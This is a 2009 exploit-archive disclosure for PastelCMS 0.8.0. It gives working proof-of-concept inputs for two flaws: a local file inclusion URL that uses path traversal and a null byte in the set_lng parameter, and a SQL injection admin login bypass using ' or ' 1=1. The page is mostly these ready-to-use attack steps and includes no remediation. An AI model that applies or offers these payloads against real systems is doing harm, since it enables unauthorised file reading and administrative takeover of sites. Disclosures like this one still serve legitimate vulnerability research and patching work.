[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PastelCMS 0.8.0 (LFI/SQL) Multiple Remote Vulnerabilities
# Published : 2009-04-21
# Author : SirGod
# Previous Title : CRE Loaded 6.2 (products_id) SQL Injection Vulnerability
# Next Title : TotalCalendar 2.4 (include) Local File Inclusion Vulnerability
#########################################################################
[+] PastelCMS 0.8.0 (LFI/SQL) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
#########################################################################
[+] Download : http://pastel.pri.ee/?id=58
[+] Local File Inclusion
PoC :
http://127.0.0.1/[path]/?set_lng=../../../../../../BOOTSECT.BAK%00
[+] SQL Injection ( Login Bypass)
- Go to :
http://127.0.0.1/[path]/admin.php
- Login as the following :
Username : [REAL ADMIN USERNAME HERE] ' or ' 1=1
Password : anything
#########################################################################
# www.Syue.com [2009-04-21]